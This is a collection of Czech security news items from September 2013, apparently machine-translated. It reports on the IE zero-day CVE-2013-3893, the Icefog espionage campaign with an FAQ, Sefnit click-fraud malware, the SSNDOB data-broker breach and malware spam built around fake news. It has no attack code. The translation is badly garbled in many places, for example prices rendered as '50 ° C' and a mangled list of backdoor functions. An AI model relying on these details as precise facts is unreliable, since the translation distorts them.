Zatímco Microsoft je ještě vydat patch pro nejnovější Internet Explorer zero-day (CVE-2013-3893), zprávy přicházejí v tom, že chyba byla využívána ve větší míře a po delší dobu, než se původně věřilo.

Microsoft uznal existenci zranitelnosti a jeho aktivní využívání začátkem tohoto měsíce, a vydala Fix je nástroj pro zmírnění nebezpečí, dokud náplast může být propuštěn. Od té doby, FireEye vědci mají svázané útoky na čínské hackerské skupiny, která zasáhla Bit9 dříve v tomto roce, a mají společné, že kampaň ("Operace DeputyDog") byla zaměřena na japonských organizací a začal 19. srpna, nejpozději. Potom ve čtvrtek vědci z obou AlienVault a Websense uvolnit svá zjištění ohledně využití použít. Researcher Jaime Blasco říká, že si všimli, že se pořádá na subdoméně vlády Tchaj-wanu systému e-nákupu, a zjistil, že návštěvníci, kteří navštívili hlavní stránku poprvé, bude okamžitě přesměrován na Exploit stránku a podáváme s škodlivého souboru. ale ne všichni návštěvníci byli zaměřeni -. jen ty, jejichž systém Windows XP nebo Windows 7 systémy byly / jsou spuštěny v angličtině, čínštině, francouzštině, němčině, japonštině, ruštině, korejštině a portugalštině a používat Internet Explorer 8 nebo 9 Alex Watson potvrdil Tchaj-wan připojení. "Naše ThreatSeeker Intelligence Cloud hlášeny potenciální oběť organizace v Tchaj-wan se snaží komunikovat s příslušnou škodlivým velení a řízení serveru jako daleká záda jako 01.07.2013. Jedná C & C komunikací předcházely široce oznámenou první použití tohoto útoku infrastruktury o více než šest týdnů, a naznačuje, že útoky vůči této hrozbě herce není omezen jen do Japonska, "řekl sdílené . "Websense Threat Intelligence naznačuje, že hrozba herecké útoky nebyly omezeny pouze na Japonsku bylo oznámeno dříve. Použití samostatných IP adres , registrace domén, a permutace na kapátkem místech naznačuje vysokou segmentací mezi útoky a různé týmy, které používají stejné sady nástrojů, které využívá, a C & C infrastrukturu, "dodal.


Počítačoví zločinci využívají nejvíce novinek v rámci 22 hodin
29.9.2013 Kriminalita | Hacking

Počítačoví zločinci i nadále reagovat rychlostí blesku, když vidí příležitost využít národní nebo globální reportáž šířit malware. Ve skutečnosti zločinci vymýšlejí "Breaking News", který se zdá se vztahují k high-profil aktuálních událostí. Commtouch Security Lab neustále analyzes škodlivých kampaní, které využívají nejnovější zprávy pomocí názvu CNN a dalších významných zpravodajské nalákat příjemce e-mailu na nebezpečné stránky. Průměrná doba mezi skutečnou skutečné události, a jeho využívání pohybuje kolem 22 hodin během posledních tří měsíců. V pátek 6. září malware distributoři vymysleli falešné zprávy určené využít veřejného zájmu na možnost amerického náletu proti Sýrii. E-maily použité na předmět, "Spojené státy začaly bombardovat" a byly vytvořeny tak, aby se jako legitimní CNN news upozornění. Je to příklad cybercriminal komunity využitím zájem a úzkost o aktuálním dění, jak zvýšit úspěšnost svých škodlivých kampaní. Před Sýrie související Například průměrný čas zahájení útoku viru již klesá. V březnu roku 2013, kdy byl zvolen nový papež, první malware a phishing útoky začal po 55 hodin. V dubnu 2013 po bombardování Bostonský maraton, to trvalo 27 hodin vidět první související útoky využívající zájem o akci. Mezi další příklady patří novorozence královské dítě a zprávy o oznamovatelů NSA Edward Snowdena. Ale příklady, jako je nedávné Sýrie související kampaň v září ukazují, že spammeři nebudou čekat - jsou čím dál "rychleji" než samotné události.


Nástroje pro prohlížení infikované webové stránky
29.9.2013 Hacking | Nástroje

Na ISC jsme měli ve své dnešní zprávě od Grega o obfuscated JavaScriptu na stránkách hxxp :/ / fishieldcorp.com /. Malý průzkum ukázal, že tento web byl napaden v minulosti. Nic mimořádného, ​​jen další běh infekce mlýna stránkách.

Co stávka mě je, jak se povaha tohoto výzkumu se v posledních letech změnila. Není to tak dávno mimo kontrolu potenciálně infikovaného webové stránky by měly zúčastněné VM nebo kozího stroje a hodně trpělivosti a pokusů a omylů. V současné době existuje mnoho stránek, které budou dělat základy pro vás. Greg nám poslal odkaz na URLQuery , který zobrazuje spoustu informací o internetových stránkách, včetně skutečnosti, že tento člověk je nakažený.

Jsem stále stát fanouškem Sucuri pro tento typ výzkumu. Jako URLQuery Sucuri najde tento web infikován.

Sucuri také poskytuje některé další detaily, které jsou zajímavé. Výpis kódu JavaScriptu:

V tomto případě je to, co většina zaujalo mě, že tato černá listina stav na internetových stránkách.

V době mé recenzi se infekce stále vyzvednout různých Blacklist webových stránkách. Mezi dobou jsem tuto obrazovku, a když jsem skončil tento deník, SiteAdvisor si ji zvedl a budu předpokládat, že ostatní budou následovat v těsném závěsu.

Rozhodně jednodušší než v minulosti. Teď najít nějaký čas na tom pracovat JavaScript.


Miliony ID záznamů o prodeji , jako pět velkých datových firem hacknutý " měsíce "

27 září 2013 Hacking | Bezpečnost

" Krádež identity service ", která se specializuje na prodej osobní údaje získali přístup k některé z největších firem v Americe spotřebitelských dat , včetně Lexis Nexis a Kroll - a měl přístup k jejich počítačové systémy " měsíce " , podle zprávy .

Tato stránka ukradl 3100000 datum -of- narození záznamy a přes milión čísla sociálního zabezpečení - a nabídl údaje o slavných Američanů , včetně Michelle Obama , Beyoncé a ředitel CIA. Porušení bylo odkryto v dlouhém vyšetřování bezpečnostní expert Brian Krebs a ​​podala zprávu o Krebs pro bezpečnost .

Krebs zpráva týkající se webových stránek - ssndob [ dot] ms - což Krebs řekl, bylo nabízí osobní údaje o jakémukoli rezidentovi z USA po dobu dvou let , včetně addressses , data narození , úvěrů a ověření , s cenami v rozmezí od 50 ° C do 15 dolarů .

Krebs řekl, že doteď mnozí byli zmateni , kde tato data pochází.

" Ničemy za touto službou krádeže identity ovládat nejméně pět infikovaných systémů v různých US- založené spotřebitelů a podniků, jsou datové agregátory , " píše Krebs . " Minulý měsíc ,analýza sítí, síťové aktivity a pověření používaných správci SSNDOB naznačují, že tito jedinci byli také odpovídá za provoz malý, ale velmi silný botnet -kolekce napadených počítačů, které jsou ovládány dálkově útočníky .

"Tento botnet se zdá být v přímé komunikaci s interními systémy na několika velkých datových makléřů ve Spojených státech . "

Krebs tvrdí, že botnet měl přístup k pěti serverům , dva v vykázala databáze a dva u Dun and Bradstreet , stejně jako jiný server v Altegrity , která poskytuje zaměstnanci screening službu s názvem HireRight podle informačního věku .

Firmy tvrdí, že se vyšetřuje , podle Krebs .

Infosecurity citoval výroky analytik společnosti Gartner Avivah Litan před třemi lety v souvislosti s dostupností informací, jako jsou data narození a čísla sociálního pojištění na zločince , říkat, " " Měl jsem těžké přijít na to, jak mnoho podvodníci byli tak mohli snadno odpovědět na tyto otázky úspěšně , kdy i legitimní uživatelé mají tak těžké době pamatovat správné odpovědi na ně . "

Podle Infosecurity , Latan navrhl, že údaje firmy byli " phishingu " , aby poskytly údaje jako základ pro krádeže identity . " Oni prostě získat přístup k těmto zaměstnancům účty a získat klíče k datovým pokladů " Latan řekl: " Mohou se podívat do cokoli, co je známo o některé z nás , a vyzbrojený těmito informacemi mohou obejít většinu založené na znalostech systémy ověřování pravosti a procesy na základě externích dat z veřejných datových agregátory a úvěrovými institucemi . "

Postu Miliony ID záznamů o prodeji , jako pět velkých datových firem hacknutý " na měsíci " se objevila na prvním místě Žijeme zabezpečení.


Výzkumníci mohou vyřešili klikání problém
27. září 2013. Spam | Hacking
Klikněte na podvod je značná zátěž na finance i reklamy a reklamních sítí, ale skupina výzkumníků věří, že se jim podařilo vytvořit jednoduché řešení, které je schopno zjistit všechny aktuálně nejpoužívanější click-spamové programy. "reklamní sítě dnes , bohužel, spoléhají především na bezpečnost přes neznámo k obraně proti click-spam, "poznamenal vědci, a představil ViceROI, algoritmus, který detekuje click-spam útoky pracuje na předpokladu, že spammeři klepněte hledají vyšší návratnost investic než etického podnikání modely vyrovnávají riziko přistižení. "reklamní sítě dnes filtr click-spam reaktivně a ad-hoc způsobem - když je detekován specifický útok (často zaklíněné inzerenta) ad sítě vytváří filtr naladěn na zjištění útok, "vysvětlují. "Reaktivní filtrování poškozuje inzerenty, protože útoky mohou jít nezjištěný měsíců [...] Dále, ad-hoc-point řešení se rychle obejít útočníky, např., aby se zabránilo IP blacklist pomocí distribuované botnet, případně přidáním měsíců před tím, než je útok nově objevený více důvtipný inzerenta. " Kromě toho, je tendence reklamních sítí, "střežit své filtrovací techniky snadno zrušil nikdy nekončící evoluce click-spam malware. Takže vědci měli zajímavou myšlenku bít spammery kde to bolí -. své peněženky ". Viceroi, v podstatě, vlajky vydavatelé s abnormálně vysokým ROI Zatímco vydavatel ROI, je těžké odhadnout, v praxi jsme našli na uživatele příjmy úzké proxy," vysvětlují vědci. "Aby nedošlo k detekci Viceroi, musí click-spammeři snížit jejich jednotlivých uživatelů příjmy jako etického vydavatele. V tom okamžiku, aniž by ekonomická pobídka k posunu riziko přistižení (o přístupy, které doplňují Viceroi), čistý dopad odrazovat od páchání click-spam. " a funguje to. Mají testovali algoritmus spolupracuje s velkým reálném reklamní sítě, a říkají, že technika uvidí šest různých tříd click-spamových útoků - Malware-řízený, search-únos, arbitráž, konverzní podvodům, ad injekci a Zaparkoval-domény - bez dalšího ladění (podrobné případové studie, přečtěte si podrobnou zprávu .) Viceroi nemůže "říkají" pro jistotu, že vydavatelé to skvrny jsou rozhodně na tlačítko-spammery, ale umožňuje reklamní sítě ručně kontrolovat a vyšetřovat mnohem menší počet potenciálních podvodných podniků.


čas na změnu v přemýšlení o bezpečnosti, říkají odborníci
27.9.2013
Hacking
WASHINGTON -Security, jako spousta jiných věcí, má tendenci jít v několika fázích. Nový útok technika se vyvíjí, výrobci reagují s novou defenzivní technologií, a pak útočníci najít způsob, jak ho porazit. Vždy to tak bylo. A právě teď, věci se zdají být v jednom z těchto pravidelných dolů cyklů, při kterých útočníci mají navrch.

V minulosti to, co pomohlo prolomit tento cyklus je inovace, nové technologie nebo architektura, která umožňuje houpání věci zpět v opačném směru. Alespoň dočasně. Bezpečnostní manažeři u některých větších finančních institucí a provozovatelů sítí na světě, mluví na panelu zde ve středu řekl, že nastal čas pro další takové probuzení.

"Myslím, že jsme v bezpečnostním říje právě teď," řekl Ed Amoroso, šéf bezpečnosti na AT & T, řekl během panelové diskuse na summitu Cybersecurity Billington.

Problém po ruce je, že zatímco útočníci byli přizpůsobuje a mění své postupy a metody rychle v průběhu několika posledních let, obranné společenství teprve musí dohnat a provést změny potřebné k obnovení zdání pořádku. Útočníci, jako ti za nově objevené Icefog útoku , mají navrch v mnoha ohledech, v neposlední řadě z ​​nich je v tom, že luxus času, aby sle své cíle, naučit ležel na zemi a najít slabá místa, které potřebují dostat dovnitř bezpečnostních týmů, i dobře organizované a zkušenější, jsou v nevýhodě v této rovnici. I když je útok objeven v procesu, je to někdy těžké říct, co bylo přijato, jak dlouho útočníci měli přístup k síti a které stroje byly ohroženy.

Jak maxim jde, útočníci musí být pouze jednou doprava, zatímco obránci mít pravdu celou dobu.

Změna tohoto stavu věcí se nestane přes noc a cesta k tomuto cíli rozhodně není bez překážek. To může vyžadovat změny některých základních procesů a systémů, které byly pilíři bezpečnostní infrastruktury po celá desetiletí. Ověření, například. Zvažoval foundational technologie tak dlouho, jak počítače byly kolem, může ověřování přežily svou užitečnost.

"V mém světě, ověřování, není slovo, které jsme použili už ne," řekl Charles Blauner, globální vedoucí informační bezpečnosti v Citi, který byl součástí panelu Billington. "Je čas se pohnout dál. Pro nás, přemýšlíme, pokud jde o uznání spíše než ověřování. Je to o tom mít systém říkat, 'já poznávám ", a jít od toho."

Jedna z věcí, která byla opěvována jako oprava ověřování problému je biometrická technologie. Myšlení jde, že vyžaduje, aby uživatel použít heslo i něco jako otisk prstu nebo sken duhovky je mnohem obtížnější pro útočníka vydávat se za něj. Nicméně, ne všechny biometrie stvořeni sobě rovni, Amoroso řekl.

"Existují dvě varianty biometrie. Jedním z nich je chuť, kam ukládáte otisk lokálně na zařízení a používá se tam, "řekl. "Chuť B, budete mít biometrický a odeslat ji na drát a je uložena v centrální databázi. Poté, co projde drátu, může být ohrožena. A nemůže být změněna. Takže myslím, že chuť je dobrá, ale chuť B potřebuje nějakou práci. "

Změna přichází pomalu v oblasti bezpečnosti, ale to může být čas, aby věci urychlit.


Krádež  Nový Click podvodům Malware Souvisí Tor Botnet
27. září 2013. Viry | Hacking
tor_clickfraudKRADMÝ NEW CLICK PODVODŮM MALWARE SOUVISÍ TOR BOTNET
Malware rodina, pravděpodobně vyvinutý stejných autorů, kteří vybudovali masivní botnet nedávno objevil na síti Tor , byl oživen s kradmý nové click-podvod podvod.

Microsoft hlásí vyrážku nových podvodná kliknutí činnosti spojené s Sefnit malware, který byl myšlenka mrtvá a pohřbená v roce 2011, Microsoft Malware Protection Center výzkumník Geoff McDonald napsal v blogpost tento týden.
McDonald řekl, Microsoft objevil nový podvodná kliknutí komponenty do Sefnit malware v červnu, jeden, který používá open source 3proxy projektu. Původně Microsoft uvedl, že klasifikovala podvodná kliknutí část Sefnit jako Mevade malware, ale nyní je považuje za stejné rodiny.

"Botnet z Sefnit hostovaných serverů proxy se používá k přenosu HTTP předstírat, kliknout na reklamu," řekl McDonald.

Použití proxy udržuje hladinu hluku dolů na Sefnit činnosti, na rozdíl od předchozích verzí malware, který by unést kliknutí z výsledků vyhledávání, posílá ty prokliky přes agenturu na webovou stránku, připomínající uživatele určení.

"Tato kliknutí jsou obecně považovány za poměrně vysokou hodnotu a je těžké odhalit podvody z pohledu," řekl McDonald.

Tam nebylo nic zastavit pozorný uživatele, nicméně, od všiml, že se nejedná přistáli na stránky, které hledali a předložení otázce bezpečnostní výzkumník, uvedl Microsoft. Nežádoucí pozornost, odborníci si myslel, způsobil Sefnit gang zavřít krám.

V červnu byl malware znovu nalézt funguje jako proxy služby na 3proxy.

"Nová verze Sefnit nevykazuje žádné zřetelné viditelné příznaky uživatele upozornit na botnet," řekl McDonald. "To jim umožnilo vyhnout pozornost od antimalware vědců za pár let."

Botnet serverů proxy se odesílá požadavky, nebo falešné prokliky, prostřednictvím sítě affiliate programy, jako je vyhledávání Mywebsearch [.] Com a oprávněné reklamní agentury, aby nakonec podvádět legitimní inzerenta.

Společnost Microsoft poskytuje příklad použití Groupon. V Sefnit autoři pravděpodobně Mywebsearch pobočka, a používat službu proxy přesměrovat provoz na affiliate na "falešné" kliknutím na reklamu na Google Groupon místě, šidit Groupon v tomto procesu. Prodejce musí platit společnosti Google za falešné kliknutí, Google má svůj podíl a následně vyplatí zbytek na Mywebsearch affiliate.

Chcete-li zachovat podvod trvale, malware autoři vybudovali časové prodlevy do systému tak, aby se malware nebude příliš často klikněte na reklamy, varování proti podvodům služby.

Microsoft uvedl, že Trojan Sefnit se šíří podél legitimní instalací aplikace File Scout, také vyvinutého Sefnit gangu.

"Konkrétně se předpokládá, že podobnou formátu XML strukturu pro C a C-stáhnout a provádět příkazy, jsou obě aplikace distribuovány, a dvě aplikace byly zpracovány 15 minutách po sobě se stejným překladačem," řekl McDonald.

Sefnit se šíří také na některých softwarových instalaci InstallBrain Bundler a přes eMule peer-to-peer sítě.

"Autoři přizpůsobily své mechanismy klikání způsobem, který bere v interakci uživatele z obrazu při zachování efektivity," řekl McDonald. "Toto odstranění uživatelského interakce závislosti na metodice klikání byl velký faktor v Sefnit autoři budou moci zůstat mimo radarů zabezpečením výzkumných pracovníků v průběhu posledních několika let."

Mevade mezitím způsobil rozruch v polovině srpna, kdy odborníci uvědomili počet uživatelů Tor vyletěla z 500.000 na téměř 3 miliony, a spekuloval, že botnet se usídlil v síti a botmaster se používat ke komunikaci s ohrožen hostitelé a vyhnout se potenciálním takedown pokusy.

Rozhodnutí přejít na Tor, nicméně, byl jeho zkázou. Odborníci Damballa Labs uvedl, že příliv uživatelů Tor přitáhl nežádoucí pozornost k botnetu vedoucí k jeho odhalení. Výzkumník Mark Gilbert řekl Threatpost že botmaster byl pravděpodobně pronájmu části botnet Mevade pro click-podvod, adware podvody a dokonce i datové průsaků.


Icefog špionáž Kampaň "Hit and Run" Cílený provoz

26. září 2013. KyberWar | Hacking

Špionáž kampaň představovat přesné zacílení obětí a malware, který umožňuje útočníkům jeden na jednoho interakce s ohroženého systému byl odkryt. Vládní agentury, výrobci high-tech společnosti a mediálních organizací v Jižní Koreji a Japonsku byly primární cíle kampaně s názvem Icefog, který byl dnes oznámila výzkumníky společnosti Kaspersky Lab.

Čína-založené kampaně je dva roky starý a následuje vzor obdobných APT stylu útoků, kde se oběti ohrožena prostřednictvím škodlivého přílohu v kopí-phishing e-mail, nebo jsou lákáni na webové stránky a ohrožení napaden škodlivým softwarem.

icefogphishingemail

Nicméně, zatímco jiné APT kampaně udržovat dlouhodobé přetrvávání uvnitř infikovaných sítí Icefog Zdá se, že pravý opak. Útočníci, Kaspersky vědci, vědí, co potřebují od oběti a jakmile to mají, se opouští cíl. Jsou také pravděpodobné, že malá skupina najatých pistolníků, blízký žoldáků, zneužita k útoku na určitou skupinu, krást data, a dostat se rychle.

"Vstoupili jsme do éry rostoucího počtu těchto menších, agilní skupiny najatých na jednotlivé projektové bázi," řekl Kaspersky Lab vědec Kurt Baumgartner, mluví dnes na summitu Cybersecurity Billington ve Washingtonu, DC "Operativní zlepšení přišli a tyto leštěné APT skupiny se mnohem lépe letí pod radarem.

"Hledání vzoru ve všech hluk není snadné. Je to stále těžší a těžší identifikovat vzory a spojit je se skupinou, "řekl Baumgartner.

K dnešnímu dni, Kaspersky Lab Global Research and Analysis Team zaznamenal šest variant Icefog a byl schopen sinkhole 13 domén používaných v útoku, zachycovat snímky z použitého malware a zaznamenává podrobně obětí a interakci se velení a řízení serverů.

Windows a Mac OS X verze Icefog byly pozorovány také, ale zdá OS X backdoor je pouze beta soud malware, z velké části nacházejí v on-line čínských nástěnkách. Mezitím, více než 200 unikátních systémem Windows IP adresy se připojit k Kaspersky kontrolované jámě, jen zlomek z celkového počtu infekcí vědci.

kurt_baumgartner"Je to tým operátorů, které jsou právě velmi selektivní a jít po přesně to, co potřebují," řekl Baumgartner, že jo. "Je to klasický APT chování. Mají pravděpodobně předchozí znalosti sítí a cílů. "

Tyto cíle zahrnují dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost, stavba lodí společnosti DSME Tech, Hanjin Heavy Industries, telekomunikační operátoři, jako je Korea Telecom a mediální společnosti, jako je Fuji TV.

Icefog nejen vytváří backdoor připojení k útočníkovi ovládané zabezpečovací infrastrukturou, ale také sníží množství nástrojů, které umožňují útočníci ukrást určité typy dokumentů a otočte do infikovaného společnost hledá pro více počítačů, infikovat a další zdroje krást.

Kampaň se rovněž opírá o zneužití chyb zabezpečení, které byly záplatované ve Windows nebo Java vytvořit oporu na koncový bod. Vzdálené spuštění kódu chyby v operačním systému Windows (CVE-2012-0158 a CVE-2012-1856) se šíří přes škodlivé aplikace Word nebo Excel soubory jsou nejběžnější způsob zahájení Icefog útok. V infikované prílohy nic slíbit z nedovoleného obraz ženy k dokumentu napsaného v japonštině s názvem: "Malý nadšení pro regionální suverenity reformy." Uživatelé jsou také poslal odkazy na napadených místech hosting Java exploity (CVE-2013-0422 a CVE-2012 -1723).

Jednotlivé kampaně spear phishing byly také spatřen použití HLP-starší verze WinHelp souborů, infikovat cíle. WinHelp byl podporován nativně, dokud systém Windows Vista byl propuštěn.

"S největší pravděpodobností, volba zneužívání WinHelp naznačuje, že útočníci mají představu o tom, jaká verze operačních systémů útočí," stojí ve zprávě Kaspersky řekl.icefog

Další spear phishing snaha použít NsP soubory dokumentů šířit Icefog, HWP je proprietární formát dokumentu používá v Jižní Koreji, a to zejména ze strany vlády.

Jakmile je počítač napaden, útočníci samostatně analyzovat informace o systému a soubory uložené na počítači, a pokud to projde shromáždit, jsou zadní vrátka a příčný pohyb nástroje vzdáleně odeslána do zařízení, včetně hesla a hash-vých nástrojů pro uložený Internet Explorer a Outlook hesla. Kompresní program je také poslán ke kompresi ukradených dat dříve, než bude odeslána na velení a řízení serveru. Za pověření oběti ztrácejí soubory systému Windows Address Book (. WAB), stejně jako HWP, Excel a Word.

Ze šesti variantách, nejstarší v roce 2011 použity v útoku na dům v Japonsku reprezentantů a Sněmovny radních. Šest AOL e-mailové adresy byly použity a příkazy byly načteny z těchto účtů.

Nejvíce obyčejně viděný Icefog varianta se nazývá typ 1 a má všechny zadní vrátka a stranového pohybu funkcí popsaných výše, stejně jako dává útočníkům přístup k vykonání SQL příkazů SQL serverů nalezených v síti. Je to tady, kde byl termín Icefog vidět v řetězci použité velení a řízení serveru (C & C je software s názvem Tři Dagger). Velení a řízení skript, zatím, poskytuje profesionálně vypadající rozhraní pro komunikaci a interakci s napadených počítačů. To používá nativní souborový systém pro ukládání dat ukradených a dočasné soubory.

"Asi nejzajímavější je, že typ 1 C & C panel udržuje úplnou historii útočníka interakci s obětí," píše se ve zprávě. "To je veden jako šifrované logfile, v" logs "adresáře na serveru. Kromě toho, že server udržuje plné interakce protokoly a výsledky provedení příkazu z každé oběti. "

Další varianta byla použita ke zvýšení typu 1 infekce s další šifrování zamlžování komunikaci s příkazem servery. To nebyla použita proti oběti a zmizel, jakmile počítač byl restartován.

Vzorky pro další dvě varianty ještě získat, ale Kaspersky byl schopen sinkhole tři domény používané s těmito útoky. Tyto dvě varianty se pouze prohlížet a aktualizovat schopnosti.

ips_icefog

Nejnovější verze, Icefog-NG, nekomunikuje s centrálním serveru a příkaz namísto použití webserver, jeho velení a řízení je Windows desktop aplikace, která funguje jako samostatný server naslouchá na portu TCP 5600.

Kaspersky uvedl, že jako první získala Icefog vzorku v červnu po útoku na Fuji TV. Bylo možné pospojovat zpět do útoku na japonské parlamentu před dvěma lety.

"Předpokládáme, počet malých, zaměřených APT-nájemných skupin rostou, specializující se na hit-and-run operací, jakýsi" žoldáků "kyber-moderního světa," píše se ve zprávě.


Amateur hacker za DDoS na Čínu?
26. září 2013. Počítačový útok | Hacking
Když na konci srpna, byla v Číně Domain Name Service zaměřen mohutným útoku DDoS , které v konečném důsledku vést k mnoha internetových stránkách, že je zcela nedostupné pro dobu, každý chtěl otázky odpověděl byly: kdo to udělal a proč?
Podle nejnovějších informací zveřejnil Wang Minghua, operátor s National Emergency počítačové sítě koordinační středisko v Číně (CNCERT / CC), útok se zdá k byli vázána na jediný, amatérský hacker z Čching-tao v provincii Šan-tung . útok nebyl proveden záměrně, říká, jak se hacker hledal DDoS herní server a má servery útoku vládních omylem. Úřady se podařilo ho vystopovat, protože nasedl útok z jeho vlastní IP adresu. Ale, jak Jižní Morning Čína Post poznámky , je to ještě možné, že podezřelý není skutečný útočník. Ve skutečnosti, ne před dvěma týdny, oficiální prohlášení od orgánů identifikovány útočníci jako skupina hackerů s obchodními zájmy, kteří používají velký botnet připojit útok. Proč ta náhlá změna postoje? To je těžké říct. Ale Shangai bázi kybernetické expert řekl, že měl své pochybnosti o "hacker" osamělého teorie říká, že útok byl prostě příliš drahé, aby zahájila pro náhodné, amatérské hackery.


V Icefog APT: Často kladené dotazy

26.9.2013 Zdroj: Kaspersky Hacking | Viry
Zde jsou odpovědi na nejčastěji kladené otázky týkající se Icefog, APT operací zaměřených subjektů v Japonsku a Jižní Koreji.

Co přesně je Icefog?
Icefog odkazuje na cyber-špionážní kampaň, která působí nejméně od roku 2011. Je zaměřen na vládní instituce, vojenští dodavatelé, námořní a lodní stavební skupiny, telekomunikační operátoři, satelitní operátoři, průmyslové a špičkové technologie a média, zejména v Jižní Koreji a Japonsku. Je pravděpodobné, že posádka je zaměřena na organizace v západním světě, stejně jako v USA a Evropě.

Kdo jsou oběti?
V tuto chvíli jsme nezveřejnění jména obětí. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.

Co můžete říci o cílech útoků?
Náš technický výzkum ukazuje, že útočníci měli zájem o cílení na množství subjektů, a to zejména v Jižní Koreji, Tchaj-wanu a Japonska. Patří dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost, loděnice jako DSME Tech, Hanjin Heavy Industries, telekomunikační operátoři, jako je Korea Telecom, mediální společnosti, jako je Fuji TV a Japonsko-Čína ekonomické asociace.

Skutečnost, že výše uvedené organizace byl zaměřen neznamená, že útoky byly také úspěšné. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.

Jednou z nejvýznamnějších událostí, které se podílejí tato hrozba herce se konal v roce 2011, kdy japonská Sněmovna reprezentantů a dům členů rady bylo infikováno

Víme, celkový počet obětí?
Jako obvykle, je-to obtížné získat přesný odhad počtu obětí. Jsme viděl jen část celkového obrazu, který zobrazuje několik desítek Windows obětí a více než 350 Mac OS X oběti. Je-je důležité zdůraznit, že drtivá většina obětí Mac OS X (95%) v Číně.

Proč říkáte Icefog?
Jméno "Icefog" pochází z řetězce používané v rozkazech a jejich řízení serveru (C & C) název jedné z námi analyzovaných vzorků malwaru. Také potvrdil, že C & C je software s názvem "Tři Dagger" ("尖刀 三号"), při překladu z čínštiny.

Pro fanoušky bojových umění, "尖刀 三号" je podobný "三 尖刀", což je starověké čínské zbraně.

Poznámka: Jiný název pro backdoor použitého v těchto útocích je "Fucobha".

Co Icefog dělat?
Ve své podstatě, Icefog je backdoor, který slouží jako interaktivní špionážní nástroj, který je přímo řízen útočníků. To neznamená automaticky exfiltrate data, ale je místo toho ovládán manuálně, díky útočníků provádět akce přímo na živých infikovaných systémů. Během Icefog útoků, několik dalších škodlivých nástroje a backdoory nahrát strojů obětí pro boční pohyb a dat průsaků.

Jak Icefog infikovat počítače?
Icefog je distribuován do cíle pomocí kopí phishingové e-maily, které může být buď mají přílohy nebo odkazy na nebezpečné webové stránky. Útočníci vložit exploity pro několik známých zranitelností (např. CVE-2012-1856 a CVE-2012-0158) do aplikace Microsoft Word a Excel dokumenty. Jakmile jsou tyto soubory jsou otevřeny na cíl, je backdoor spadl do systému a návnada dokument se pak ukázalo, oběti.
Lure dokument zobrazený na oběti při úspěšné realizaci exploitu.

Kromě dokumentů Office, útočníci používají nebezpečné stránky s JAVA využije (CVE-2013-0422 a CVE-2012-1723) a škodlivý NsP a HLP soubory.

Poznámka 1: Oracle vydali patche jak pro JAVA využije Leden 20, 2013 12.06.2012 resp.

Poznámka 2: "HWP" jsou textové soubory používané procesoru Hangul Word. Podle Wikipedie, Hangul (také známý jako Processor Hangul Word nebo NsP) je proprietární aplikace na zpracování textu publikoval jižní korejské společnosti Hancom Inc To je používáno značně v Jižní Koreji, a to zejména ze strany vlády.

Jsou útočníci používají nějaké zero-day zranitelnost?
Nesetkali jsme se používání jakýchkoli zero-day zranitelností. Nicméně, nemůžeme zcela vyloučit, že unpatched slabá místa softwaru, může být cílené.

Na jedné z obětí, jsme pozorovali, co se zdá být použití Kernel exploit přes Java aplikaci za to, co se zdálo, že eskalace oprávnění, i když nevím, jestli je to zero-day, či nikoli soubor byl smazán útočníků po použití.

Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty?
K dispozici jsou i Windows a OS X varianty Icefog. V počítačích se systémem Windows jsou infikováni prostřednictvím "Udeř a uteč" cílených útoků. Útočníci přijde krást, co chtějí, a odejít. Mac OS X stroje byly napaden jiným způsobem v tom, co se zdá být "beta testování" fáze Mac OS X backdoor.

Už jste viděli důkaz o mobilní komponent v. iOS, Android nebo BlackBerry?
I když máme podezření na možný Android variantu, máme-útočiště t byl schopen najít to ještě.

Co se stane po cílový počítač je nakažený?
Jakmile backdoor dostane klesl na stroj, pracuje jako dálkově Trojan se čtyřmi základními kybernetické špionáže funkcí:

Únosy a obrázky základní informace o systému C & C servery vlastnictví a pod kontrolou útočníků.
Umožňuje útočníci tlačit a spouštět příkazy infikovaného systému.
Krást a vkládat z obětí na velení a řízení serverů. Stahování souborů (nástroje) z C & C servery do infikovaných počítačů.
Umožňuje útočníci přímo spouštět SQL příkazy na všech MSSQL serveru v síti.
Jak je to odlišné od jakéhokoli jiného APT útoku?
Obecně platí, že každý APT útok je jiný a jedinečný ve svém vlastním stylu. V případě Icefog, existují určité charakteristické rysy, které se odlišuje:

Zaměřují téměř výhradně na Jižní Koreje a Japonska cíle.
Krádež souborů není automatické, místo toho útočníci zpracování obětem jeden po druhém - se najít a zkopírovat pouze související informace.
Web-based velení a řízení implementace s pomocí. NET.
Velení a řízení zachování plné útok na špalky plněné každý příkaz běžel útočníků na jejich oběti.
Použití NsP dokumentů se využije.
Několik set Mac OS X infekce.
Jak jste si vědomi této hrozby? Kdo to nahlásil?
V červnu 2013 jsme získali cílený útok proti vzorku Fuji TV. Kopí-phishing e-mail obsahoval škodlivý přílohu, která klesla na Icefog malware. Po další analýze jsme identifikovali další varianty a více kopí phishingové útoky.

Při analýze nový útok, to stalo se jasné, to byla nová verze malwaru, který napadl japonské parlamentu v roce 2011 . Vzhledem k významu útoku, jsme se rozhodli udělat důkladné vyšetřování.

Kolik varianty Icefog existuje? Existují velké rozdíly ve variantách?
Existuje několik variant, které byly vytvořeny v průběhu let. V naší analýze jsme sledovali:

"Staré" 2011 Icefog - který pošle ukradené údaje prostřednictvím e-mailu, tato verze byla použita proti japonskému parlamentu v roce 2011.
Typ "1", "normální" Icefog - který spolupracuje s C2-S.
Typ "2" Icefog - které komunikuje s proxy, která přesměruje příkazy z útočníků.
Typ "3" Icefog - my don-t mít vzorek, ale jsme zaznamenali určitý druh C2, který používá jiný způsob komunikace, máme podezření, že jsou oběti, které mají tento malware.
Typ "4" Icefog - stejná situace jako "typ 3".
Icefog-NG - který komunikuje pomocí přímého připojení TCP na portu 5600 na C2.
Je velení a řízení serveru používá Icefog stále aktivní? Už jste byli schopni sinkhole některý z C & Cs?
